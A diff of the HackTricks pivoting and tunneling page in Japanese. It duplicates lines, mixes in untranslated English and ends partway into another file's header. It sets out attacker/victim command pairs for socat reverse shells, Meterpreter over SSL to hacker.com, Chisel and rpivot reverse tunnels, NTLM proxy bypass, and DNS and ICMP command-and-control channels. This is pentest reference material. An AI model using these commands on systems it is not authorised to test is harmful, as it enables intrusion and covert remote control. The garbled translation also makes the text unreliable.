この場合、**ポートはビーコンホストで開かれます**、チームサーバーではなく、トラフィックはチームサーバーに送信され、そこから指定されたホスト:ポートに送信されます。
この場合、**ポートはビーコンホストで開かれ**、チームサーバーではなく、トラフィックがチームサーバーに送信され、そこから指定されたホスト:ポートに送信されます。
{% endhint %}
```bash
rportfwd [bind port] [forward host] [forward port]
rportfwd stop [bind port]
```
注意事項:
- Beaconの逆ポートフォワードは常にトラフィックをTeam Serverにトンネリングし、Team Serverがトラフィックをその意図した宛先に送信するため、個々のマシン間でトラフィックを中継するためには使用しないでください。
- トラフィックはBeaconのC2トラフィック内でトンネリングされ、別々のソケット上ではなくP2Pリンク上でも動作します。
- 高いポートで逆ポートフォワードを作成するには、ローカル管理者である必要はありません。
### ローカルrPort2Port
### rPort2Port ローカル
{% hint style="warning" %}
この場合、ポートはTeam ServerではなくBeaconホストで開かれ、トラフィックはCobalt StrikeクライアントTeam Serverではなくに送信され、そこから指定されたホストポートに送信されます。
この場合、**ポートはビーコンホストで開かれ**、チームサーバーではなく**トラフィックはCobalt Strikeクライアントに送信**され、そこから指定されたホスト:ポートに送信されます。
{% endhint %}
```
rportfwd_local [bind port] [forward host] [forward port]
@ -197,14 +177,14 @@ rportfwd_local stop [bind port]
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
ウェブファイルトンネルをアップロードする必要があります: ashx|aspx|js|jsp|php|php|jsp
Webファイルトンネルをアップロードする必要がありますashx|aspx|js|jsp|php|php|jsp
```bash
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
```
## Chisel
[https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)のリリースページからダウンロードできます。\
クライアントとサーバーで**同じバージョンを使用する必要があります**
**クライアントとサーバーで同じバージョンを使用する必要があります**
### socks
```bash
@ -215,23 +195,7 @@ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/t
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker
```
### ポートフォワーディング
Port forwarding is a technique used to redirect network traffic from one port to another. It is commonly used in situations where a device or service is behind a firewall or NAT (Network Address Translation) and needs to be accessed from outside the network.
ポートフォワーディングは、ネットワークトラフィックを1つのポートから別のポートにリダイレクトするための技術です。これは、デバイスやサービスがファイアウォールやNATネットワークアドレス変換の背後にあり、ネットワークの外部からアクセスする必要がある場合によく使用されます。
Port forwarding can be done using various methods, including SSH tunneling, reverse SSH tunneling, and tools like ngrok. It allows users to access services running on specific ports on a remote server or device, even if those ports are blocked or not directly accessible from the internet.
ポートフォワーディングは、SSHトンネリング、逆SSHトンネリング、ngrokなどのツールを使用して行うことができます。これにより、特定のポートで実行されているサービスにリモートサーバーやデバイスからアクセスすることができます。これにより、それらのポートがブロックされているか、インターネットから直接アクセスできない場合でも、ユーザーはアクセスすることができます。
Port forwarding is commonly used in scenarios such as remote access to a home network, accessing a web server running on a non-standard port, or exposing a local development server to the internet for testing purposes.
ポートフォワーディングは、ホームネットワークへのリモートアクセス、非標準ポートで実行されているWebサーバーへのアクセス、テスト目的でローカル開発サーバーをインターネットに公開するなどのシナリオでよく使用されます。
Overall, port forwarding is a useful technique for bypassing network restrictions and accessing services that are not directly reachable. It provides flexibility and convenience in managing network traffic and accessing resources remotely.
全体的に、ポートフォワーディングは、ネットワークの制限を回避し、直接到達できないサービスにアクセスするための便利な技術です。ネットワークトラフィックの管理やリモートリソースへのアクセスにおいて、柔軟性と利便性を提供します。
### ポート転送
```bash
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
@ -241,7 +205,7 @@ Overall, port forwarding is a useful technique for bypassing network restriction
[https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
リバーストンネル。トンネルは被害者から開始されます。\
127.0.0.1:1080にSocks4プロキシが作成されます。
127.0.0.1:1080 に socks4 プロキシが作成されます。
```bash
attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
```
@ -249,7 +213,7 @@ attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127
```bash
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999
```
**NTLMプロキシ**を介してピボットする
**NTLMプロキシ**を介してピボット
```bash
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd
```
@ -267,95 +231,19 @@ victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
```
### リバースシェル
A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands.
To establish a reverse shell, the attacker typically needs to have a listener running on their machine and a payload on the target machine. The payload is usually a piece of code or a script that, when executed on the target machine, connects back to the attacker's machine.
Once the reverse shell connection is established, the attacker can interact with the target machine's command prompt or shell, just as if they were physically present on the machine. This provides the attacker with a powerful tool for remote exploitation and control.
Reverse shells are commonly used in penetration testing and ethical hacking to gain unauthorized access to systems for the purpose of identifying vulnerabilities and improving security. However, they can also be used maliciously by attackers to gain unauthorized access to systems for nefarious purposes.
It is important to note that using reverse shells without proper authorization is illegal and unethical. Only use reverse shells in a legal and responsible manner, with the appropriate permissions and within the boundaries of the law.
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
### ポートツーポート
ポートツーポートPort2Portは、ネットワーク上の2つのポート間で通信を転送するための技術です。これにより、ネットワーク上の異なる場所にある2つのシステム間で通信を確立することができます。
ポートツーポートは、ポートフォワーディングとも呼ばれ、さまざまな目的で使用されます。例えば、セキュリティテスト中に、攻撃者は脆弱なシステムにアクセスするためにポートツーポートを使用することがあります。
ポートツーポートの設定には、いくつかの方法があります。一つは、SSHトンネリングを使用する方法です。SSHトンネリングでは、SSH接続を介してポートを転送することができます。
また、ツールやソフトウェアを使用してポートツーポートを設定することもできます。例えば、`socat`や`netcat`などのツールを使用することができます。
ポートツーポートは、ネットワーク上の通信を制御するための重要な技術です。しかし、悪意のある目的で使用されることもありますので、セキュリティ上の注意が必要です。
```bash
socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
```
### ソックスを介したポート間の接続
Sometimes, you may need to establish a connection between two ports on different systems. This can be achieved using a SOCKS proxy.
時には、異なるシステム上の2つのポート間で接続を確立する必要があります。これは、SOCKSプロキシを使用して実現することができます。
To do this, you will need a SOCKS proxy server running on a system that has access to both ports. You can use tools like `ssh` or `proxychains` to set up the SOCKS proxy.
これを行うには、両方のポートにアクセスできるシステム上で実行されているSOCKSプロキシサーバーが必要です。`ssh`や`proxychains`などのツールを使用して、SOCKSプロキシを設定することができます。
Here's an example of how to establish a port-to-port connection using a SOCKS proxy:
以下は、SOCKSプロキシを使用してポート間接続を確立する方法の例です。
1. Start the SOCKS proxy server on the system with access to both ports. For example, using `ssh`:
```bash
ssh -D <local_port> <user>@<proxy_server>
```
Replace `<local_port>` with the local port number you want to use for the SOCKS proxy, `<user>` with your username, and `<proxy_server>` with the address of the system running the SOCKS proxy server.
`<local_port>`をSOCKSプロキシに使用するローカルポート番号、`<user>`をユーザー名、`<proxy_server>`をSOCKSプロキシサーバーを実行しているシステムのアドレスに置き換えてください。
2. Configure the application or service you want to connect to use the SOCKS proxy. This can usually be done by specifying the proxy settings in the application's configuration or using environment variables.
接続したいアプリケーションやサービスがSOCKSプロキシを使用するように設定します。通常、アプリケーションの設定でプロキシ設定を指定するか、環境変数を使用して行うことができます。
3. Connect to the destination port on the remote system using the local port specified for the SOCKS proxy. For example, using `nc`:
```bash
nc -x localhost:<local_port> <destination_ip> <destination_port>
```
Replace `<local_port>` with the same local port number used for the SOCKS proxy, `<destination_ip>` with the IP address of the remote system, and `<destination_port>` with the port number of the destination service.
`<local_port>`をSOCKSプロキシに使用したローカルポート番号、`<destination_ip>`をリモートシステムのIPアドレス、`<destination_port>`を宛先サービスのポート番号に置き換えてください。
By setting up a SOCKS proxy and configuring your applications or services to use it, you can establish a connection between two ports on different systems. This can be useful for various purposes, such as accessing services that are only available on specific ports or bypassing network restrictions.
### ソックスを介したポートツーポート
```bash
socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
```
### SSL Socatを介したMeterpreter
このテクニックでは、SSL Socatを使用してMeterpreterセッションを確立します。これにより、通信が暗号化され、セキュリティが向上します。
1. まず、攻撃者はリスニングマシンでSSL Socatをセットアップします。これにより、攻撃者のマシンがSSLトンネルを作成し、Meterpreterセッションを受け入れる準備が整います。
2. 次に、攻撃者はリモートマシンにバックドアを配置します。バックドアは、攻撃者のマシンに接続するためのトンネルを作成します。
3. バックドアがリモートマシンに配置されたら、攻撃者は以下のコマンドを使用してMeterpreterセッションを確立します。
```
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:"cmd.exe"
```
このコマンドでは、443ポートでSSL Socatをリッスンし、`server.pem`証明書を使用して暗号化を行います。`verify=0`オプションは、証明書の検証を無効にします。`fork`オプションは、新しいプロセスを作成して接続を処理します。`EXEC:"cmd.exe"`は、接続が確立されたら`cmd.exe`を実行します。
4. バックドアがMeterpreterセッションを確立すると、攻撃者はMeterpreterコマンドを使用してリモートマシンを制御できます。
この方法を使用すると、通信が暗号化されるため、ネットワーク上での検出が困難になります。ただし、攻撃者はSSL Socatをセットアップするための事前の準備が必要です。
### SSLソケットを介したMeterpreter
```bash
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333
@ -365,7 +253,7 @@ attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,f
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
```
被害者のコンソールで最後の行の代わりにこの行を実行することで**非認証プロキシ**をバイパスすることができます:
あなたは、被害者のコンソールで最後の行の代わりにこの行を実行することで**非認証プロキシ**をバイパスすることができます
```bash
OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5
```
@ -373,7 +261,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke
### SSL Socat Tunnel
**/bin/sh console**
**/bin/sh コンソール**
両側で証明書を作成します:クライアントとサーバー
```bash
@ -389,9 +277,9 @@ chmod 600 $FILENAME.key $FILENAME.pem
attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
```
### リモートポート2ポート
### リモートポートツーポート
ローカルのSSHポート22を攻撃者ホストの443ポートに接続します。
ローカルのSSHポート22を攻撃者ホストの443ポートに接続します。
```bash
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
@ -401,16 +289,16 @@ attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh o
これはコンソール版のPuTTYのようなものですオプションはsshクライアントに非常に似ています
このバイナリは被害者で実行されるため、逆接続を持つためにsshサービスとポートを開く必要があります。その後、ローカルでアクセス可能なポートを自分のマシンのポートにフォワードします。
このバイナリは被害者で実行されるため、sshクライアントであるため、逆接続を持つためにsshサービスとポートを開く必要があります。次に、ローカルでアクセス可能なポートを私たちのマシンのポートにフォワーディングするには:
```bash
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
```
## Windows netsh
### ポート2ポート
### ポートツーポート
任意のポートに対して、ローカル管理者権限が必要です。
任意のポートに対してローカル管理者である必要があります。
```bash
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
@ -422,39 +310,39 @@ netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
```
## SocksOverRDP & Proxifier
システム上で**RDPアクセス**が必要です。\
**システム上でのRDPアクセスが必要です。**\
ダウンロード:
1. [SocksOverRDP x64 バイナリ](https://github.com/nccgroup/SocksOverRDP/releases) - このツールは、WindowsのRemote Desktop Service機能の`Dynamic Virtual Channels`DVCを使用します。DVCは、**RDP接続を介してパケットをトンネリング**する役割を担っています。
1. [SocksOverRDP x64 バイナリ](https://github.com/nccgroup/SocksOverRDP/releases) - このツールはWindowsのRemote Desktop Service機能から`Dynamic Virtual Channels` (`DVC`)を使用します。 DVCは**RDP接続を介してパケットをトンネリング**する責任があります。
2. [Proxifier ポータブルバイナリ](https://www.proxifier.com/download/#win-tab)
クライアントコンピュータで、**`SocksOverRDP-Plugin.dll`**を次のようにロードします:
クライアントコンピューターで**`SocksOverRDP-Plugin.dll`**をロードします。
```bash
# Load SocksOverRDP.dll using regsvr32.exe
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
```
今、**`mstsc.exe`**を使用して**RDP**経由で**被害者**に**接続**できるようになりました。そして、**SocksOverRDPプラグインが有効**になっているという**プロンプト**が表示され、**127.0.0.1:1080**で**リッスン**するはずです。
今、`mstsc.exe`を使用して被害者にRDP経由で**接続**でき、**SocksOverRDPプラグインが有効**であるという**プロンプト**が表示され、**127.0.0.1:1080**で**リッスン**されるはずです。
**RDP**経由で**接続**し、被害者のマシンに**`SocksOverRDP-Server.exe`**バイナリをアップロードして実行してください。
**RDP**経由で**接続**し、被害者のマシンに`SocksOverRDP-Server.exe`バイナリをアップロードして実行します:
```
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
```
次に、自分のマシン攻撃者でポート1080がリッスンしていることを確認してください
今、あなたのマシン攻撃者でポート1080がリッスンしていることを確認してください
```
netstat -antb | findstr 1080
```
今、[**Proxifier**](https://www.proxifier.com/)を使用して、トラフィックをそのポートを介してプロキシすることができます。
今、そのポートを介してトラフィックをプロキシするために[**Proxifier**](https://www.proxifier.com/) **を使用できます。**
## Windows GUIアプリをプロキシ化する
[**Proxifier**](https://www.proxifier.com/)を使用して、Windows GUIアプリをプロキシ経由でナビゲートすることができます。\
**プロファイル -> プロキシサーバー**にSOCKSサーバーのIPとポートを追加します。\
**プロファイル -> プロキシ化ルール**にプロキシ化するプログラムの名前とプロキシ化したいIPへの接続を追加します。
Windows GUIアプリをプロキシを使用してナビゲートすることができます。[**Proxifier**](https://www.proxifier.com/)を使用します。\
**Profile -> Proxy Servers** でSOCKSサーバーのIPとポートを追加します。\
**Profile -> Proxification Rules** でプロキシを適用するプログラムの名前とプロキシを適用したいIPへの接続を追加します。
## NTLMプロキシバイパス
述のツール: **Rpivot**\
**OpenVPN**もこれをバイパスすることができます。設定ファイルで以下のオプションを設定します:
に言及したツール: **Rpivot**\
**OpenVPN** もこれをバイパスできます。構成ファイルで以下のオプションを設定します。
```bash
http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
```
@ -462,8 +350,8 @@ http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/)
プロキシに対して認証を行い、指定した外部サービスに転送されるローカルポートをバインドします。その後、このポートを介してお好みのツールを使用することができます。\
えば、ポート443を転送します。
プロキシに対して認証、指定した外部サービスに転送されるローカルポートをバインドします。その後、このポートを介して選択したツールを使用できます。\
たとえば、ポート443を転送します。
```
Username Alice
Password P@ssw0rd
@ -471,32 +359,32 @@ Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
```
今、例えば被害者の**SSH**サービスをポート443でリッスンするように設定した場合、攻撃者はポート2222を介してそれに接続することができます。\
また、**meterpreter**を使用して、localhost:443に接続し、攻撃者がポート2222でリッスンしている場合も同様です。
Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
## YARP
Microsoftによって作成された逆プロキシ。ここで見つけることができます[https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
A reverse proxy created by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
## DNSトンネリング
## DNS Tunneling
### Iodine
[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
DNSクエリを使用して、チュンアダプタを作成し、両方のシステムでルートが必要です。それらの間でデータをトンネルするために。
Root is needed in both systems to create tun adapters and tunnel data between them using DNS queries.
```
attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
victim> iodine -f -P P@ssw0rd tunneldomain.com -r
#You can see the victim at 1.1.1.2
```
トンネルは非常に遅くなります。このトンネルを介して圧縮されたSSH接続を作成するには、次の手順を使用します:
トンネルは非常に遅くなります。次の方法を使用して、このトンネルを介して圧縮されたSSH接続を作成できます:
```
ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
```
### DNSCat2
****[**ここからダウンロードしてください**](https://github.com/iagox86/dnscat2)**.**
[**ここからダウンロードしてください**](https://github.com/iagox86/dnscat2)**.**
DNSを介してC\&Cチャネルを確立します。ルート権限は必要ありません。
```bash
@ -507,55 +395,23 @@ victim> ./dnscat2 tunneldomain.com
attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
victim> ./dnscat2 --dns host=10.10.10.10,port=5353
```
#### **PowerShell**
#### **PowerShell**
[**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell)を使用して、PowerShellでdnscat2クライアントを実行できます
PowerShellで[**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell)を使用して、PowerShellでdnscat2クライアントを実行できます
```
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
```
#### **dnscatを使用したポートフォワーディング**
dnscatは、DNSトンネリングを使用してポートフォワーディングを実現するツールです。このツールを使用すると、DNSトラフィックを介して通信を行うことができます。
以下の手順に従って、dnscatを使用してポートフォワーディングを設定します。
1. ターゲットマシンにdnscatをインストールします。
2. ローカルマシンでdnscatを起動します。
```
dnscat server -l <local_port>
```
`<local_port>`には、ローカルマシンで使用するポート番号を指定します。
3. ターゲットマシンでdnscatを起動します。
```
dnscat client -c <dns_server> -l <local_port> -r <remote_port>
```
`<dns_server>`には、dnscatサーバーのIPアドレスを指定します。`<local_port>`には、ローカルマシンで使用するポート番号を指定します。`<remote_port>`には、ターゲットマシンで使用するポート番号を指定します。
4. ポートフォワーディングが正常に設定されたかどうかを確認します。
```
nc localhost <local_port>
```
`<local_port>`には、ローカルマシンで使用したポート番号を指定します。接続が成功した場合、ポートフォワーディングが正常に機能しています。
dnscatを使用することで、ポートフォワーディングを簡単に設定することができます。この手法は、セキュリティテストや侵入テストにおいて便利です。
```bash
session -i <sessions_id>
listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
```
#### プロキシチェーンのDNSを変更する
#### プロキシチェーンのDNSの変更
Proxychainsは、`gethostbyname` libc呼び出しを傍受し、TCP DNSリクエストをソックスプロキシを介してトンネリングします。デフォルトでは、proxychainsが使用するDNSサーバーは4.2.2.2(ハードコードされています)。変更するには、ファイル_/usr/lib/proxychains3/proxyresolv_を編集し、IPを変更します。**Windows環境**の場合、**ドメインコントローラ**のIPを設定することもできます。
Proxychainsは`gethostbyname` libc呼び出しを傍受し、tcp DNSリクエストをソックスプロキシを介してトンネリングします。**デフォルト**では、proxychainsが使用する**DNS**サーバーは**4.2.2.2**ハードコードされています。変更するには、ファイルを編集します_/usr/lib/proxychains3/proxyresolv_ そしてIPを変更します。**Windows環境**の場合は、**ドメインコントローラー**のIPを設定できます。
## Goにおけるトンネル
## Goでのトンネル
[https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
@ -566,7 +422,7 @@ Proxychainsは、`gethostbyname` libc呼び出しを傍受し、TCP DNSリクエ
[https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
[https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
両方のシステムでルート権限が必要です。TUNアダプタを作成し、ICMPエコーリクエストを使用してデータをトンネルできます。
両方のシステムでルート権限が必要で、ICMPエコーリクエストを使用してトンアダプタを作成し、それら間でデータをトンネリングするために必要です。
```bash
./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
@ -574,7 +430,7 @@ ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.1
```
### ptunnel-ng
****[**ここからダウンロードしてください**](https://github.com/utoni/ptunnel-ng.git)。
[**ここからダウンロードしてください**](https://github.com/utoni/ptunnel-ng.git).
```bash
# Generate it
sudo ./autogen.sh
@ -590,13 +446,13 @@ ssh -D 9050 -p 2222 -l user 127.0.0.1
```
## ngrok
**[ngrok](https://ngrok.com/)は、1つのコマンドラインでソリューションをインターネットに公開するためのツールです。**
*公開URIは、UID.ngrok.ioのようなものです。*
**[ngrok](https://ngrok.com/)は、1つのコマンドラインでインターネットにソリューションを公開するためのツールです。**
*エクスポージョンURIは次のようになります:* **UID.ngrok.io**
### インストール
- アカウントを作成する:https://ngrok.com/signup
- クライアントのダウンロード
- アカウントを作成: https://ngrok.com/signup
- クライアントのダウンロード:
```bash
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
@ -607,7 +463,7 @@ chmod a+x ./ngrok
**ドキュメント:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/).
*必要に応じて、認証TLSを追加することも可能です。*
*必要に応じて、認証およびTLSを追加することも可能です。*
#### TCPトンネリング
```bash
@ -617,47 +473,15 @@ chmod a+x ./ngrok
# Listen (example): nc -nvlp 4444
# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
```
#### HTTPを使用してファイルを公開する
One common use case for tunneling and port forwarding is to expose files using the HTTP protocol. This can be useful when you want to share files with others or access them remotely.
To expose files with HTTP, you can use tools like `ngrok` or `localtunnel`. These tools create a secure tunnel between your local machine and a public URL, allowing you to access your files from anywhere.
Here's a step-by-step guide on how to expose files using `ngrok`:
1. Download and install `ngrok` from the official website.
2. Open a terminal and navigate to the directory where `ngrok` is installed.
3. Run the command `ngrok http <port>`, replacing `<port>` with the port number of the local server hosting your files.
4. `ngrok` will generate a public URL that you can use to access your files. It will also display the status of the tunnel.
5. Share the generated URL with others or use it to access your files remotely.
Keep in mind that when exposing files with HTTP, anyone with the URL can access them. Make sure to secure your files and only share the URL with trusted individuals.
#### HTTPを使用してファイルを公開する
トンネリングとポートフォワーディングの一般的な使用例の1つは、HTTPプロトコルを使用してファイルを公開することです。これは、他の人とファイルを共有したり、リモートでアクセスしたりする場合に便利です。
HTTPを使用してファイルを公開するには、`ngrok`や`localtunnel`などのツールを使用できます。これらのツールは、ローカルマシンと公開URLの間に安全なトンネルを作成し、どこからでもファイルにアクセスできるようにします。
以下は、`ngrok`を使用してファイルを公開する手順のガイドです:
1. 公式ウェブサイトから`ngrok`をダウンロードしてインストールします。
2. ターミナルを開き、`ngrok`がインストールされているディレクトリに移動します。
3. `ngrok http <port>`というコマンドを実行します。`<port>`は、ファイルをホストしているローカルサーバーのポート番号に置き換えます。
4. `ngrok`は、ファイルにアクセスするために使用できる公開URLを生成します。また、トンネルの状態も表示されます。
5. 生成されたURLを他の人と共有するか、リモートでファイルにアクセスするために使用します。
HTTPを使用してファイルを公開する場合、URLを持つ人は誰でもファイルにアクセスできます。ファイルを保護し、信頼できる個人とのみURLを共有するように注意してください。
#### HTTPを使用してファイルを公開
```bash
./ngrok http file:///tmp/httpbin/
# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
```
#### HTTPコールのスニッフィング
*XSS、SSRF、SSTIに役立ちます...*
標準出力から直接、またはHTTPインターフェース [http://127.0.0.1:4040](http://127.0.0.1:4000) で行います。
#### 内部のHTTPサービスのトンネリング
*XSS、SSRF、SSTIなどに便利...*
標準出力から直接またはHTTPインターフェース[http://127.0.0.1:4040](http://127.0.0.1:4000)で。
```bash
./ngrok http localhost:8080 --host-header=rewrite
# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
@ -666,9 +490,9 @@ HTTPを使用してファイルを公開する場合、URLを持つ人は誰で
```
#### ngrok.yamlのシンプルな設定例
以下は3つのトンネルを開きます
- 2つのTCPトンネル
- /tmp/httpbin/からの静的ファイル公開を行う1つのHTTPトンネル
3つのトンネルを開きます
- 2つはTCP
- 1つは/tmp/httpbin/からの静的ファイル公開を持つHTTP
```yaml
tunnels:
mytcp:
@ -681,7 +505,7 @@ httpstatic:
proto: http
addr: file:///tmp/httpbin/
```
## その他のチェックするツール
## その他のチェックツール
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
@ -690,10 +514,10 @@ addr: file:///tmp/httpbin/
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

53
linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
View file

@ -2,23 +2,23 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
